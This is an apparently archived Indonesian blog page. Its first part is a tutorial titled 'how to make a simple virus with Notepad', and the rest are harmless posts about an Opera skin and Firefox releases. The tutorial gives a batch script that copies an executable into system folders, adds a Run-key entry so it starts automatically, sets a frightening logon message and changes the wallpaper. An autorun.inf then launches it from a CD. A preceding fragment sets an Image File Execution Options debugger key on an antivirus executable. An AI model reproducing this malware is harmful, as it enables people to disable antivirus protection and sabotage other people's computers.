HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Cara Membuat Virus Sederhana pada Komputer menggunakan Notepad

Buka Notepad ,terus copy-paste script ini..


@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- Lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- Buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- Lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- File-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- Copy file-file tsb ke CD
- Nikmati efeknya

Kamis, 30 April 2009

Opera Extreme Edition Skin

Anda bosan surfing dan browsing dengan opera skin yang biasa?

Saya punya satu solusi yaitu download skin terbaru "Extreme Edition" dijamin halal 110%
haha... hanya bercanda...



setelah mendownload, di extract dulu filenya karena masih dalam bentuk kompres ZIP, lalu copykan hasilnya.

Buka C:\programfiles\opera\skin and paste disana......


Next, buka Opera dan buka Tool --> Appearance & pilih Skin Extreme Editon

Untuk men-download skin tersebut klik disini!
share duo zone

Mozilla FireFox 3.0.10

Mozilla Firefox kembali merilis update firefox sehingga dibulan april ini sudah dua kali melakukan update. Kini Browser Firefox hadir dengan versi yang baru : Firefox 3.0.10 Final. Walaupun hanya memperbaiki dua perbaikan yaitu pada bahagian keamanan dan tingkat stabilitas, rasanya kita wajib melakukan update juga pada Firefox yang kita gunakan

Mozilla Firefox - Faster, more secure, easier to use and sporting a new look, this latest Firefox release sets a new standard for web browser innovation. Mozilla Firefox project (formerly Firebird, which was formerly Phoenix) is a redesign of Mozilla’s browser component, written using the XUL user interface language and designed to be cross-platform. It is small, fast and easy to use, and offers many advantages over other web browsers, such as the tabbed browsing and the ability to block pop-up windows.

Firefox 3.0.10 fixes two issues found in Firefox 3.0.9 :

  • Fixed a security issue.
  • Fixed a major stability issue
Untuk men-download software tersebut, silahkan klik link yang sudah saya sediakan di bawah ini :

Download Mozilla Firefox 3.0.10
Firefox from mozilla is faster, safer and smarter
sharduozone

And visit too

Firefox Latest Release!
Find the latest Firefox release in your language
mozilla.com

Mozilla FireFox 3.5 Beta 4

Mozilla Firefox telah merilis versi beta yang keempat dari rilis Firefox 3.5 beta 4 untuk versi berikutnya dari web browser Firefox. Seperti biasa, versi beta ini ditujukan untuk para pengembang dan pengujian, evaluasi dan umpan balik.

Menurut pihak Mozilla, Versi Beta 4 terbaru ini didasarkan pada platform rendering Gecko 1.9.1. Dengan teknologi baru ini, Mozilla menjanjikan Firefox baru versi 3.5 Beta 4 lebih stabil. Sementara untuk performa, kecepatan dan kompatibilitas juga sangat meningkat

Ada beberapa fitur baru ditambahkan pada release ini :

  • Enam bahasa ditambahkan dalam rilis ini, sehingga total untuk 70 bahasa
  • Ditambahkan Private Browsing Mode untuk mengontrol data pribadi,
  • Meningkatkan kinerja dan stabilitas dengan mesin baru TraceMonkey JavaScript
  • Kemampuan untuk menyediakan Lokasi mengetahui Web Browsing menggunakan standar geolocation
  • Dukungan untuk JSON asli, dan web pekerja threads
  • Perbaikan pada tata letak mesin Gecko, termasuk spekulatif parsing untuk membuat konten yang lebih cepat
  • Dukungan untuk teknologi web baru seperti: HTML5 and dan elements, download dan lainnya font baru properti CSS, JavaScript query selectors, HTML5 offline untuk aplikasi data, dan SVG transforms

Firefox 3.5 Beta 4
mendukung Operating System Windows, Mac OS X dan Linux. Untuk anda yang ingin mencoba dan menjajal versi Beta terbaru ini dapat mendownloadnya pada link download dibawah ini :

Download Firefox 3.5 Beta 4 for Windows
Firefox from mozilla is faster, safer and smarter
shareduozone

AND VISIT!

Firefox Beta Latest Release
Find the latest Firefox release in your language
mozilla.com